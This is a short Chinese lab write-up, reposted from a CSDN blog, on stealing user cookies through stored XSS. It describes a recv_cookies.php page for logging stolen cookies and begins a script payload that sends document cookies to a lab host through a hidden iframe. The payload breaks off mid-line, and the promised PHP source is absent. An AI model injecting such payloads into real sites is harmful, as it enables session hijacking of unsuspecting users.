2021-09-01 网安实验-XSS-存储型XSS获取用户cookie

一：存储型XSS

1.保存用户cookie
我们可以通过JS，构造一个请求，来请求一个我们有权限的页面，在构造请求的时候，把用户的cookie当作参数传过去，然后我们就可以在这个页面里，接收传过来的参数，然后再保存起来。所以首先需要写一个接收cookie的页面，它能够接收某个参数，然后保存起来。页面写好保存在c:\wamp\www\xss\的目录下，recv_cookies.php这个文件就是用来接收cookie并保存的，源码如下：

2.构造语句

<script>document.write("<iframe width=0 height=0 src='http://10.1.1.78/recv_cookies.php?cookie="&#
  

 

文章来源: codeboy.blog.csdn.net，作者：愚公搬代码，版权归原作者所有，如需转载，请联系作者。

原文链接：codeboy.blog.csdn.net/article/details/120053479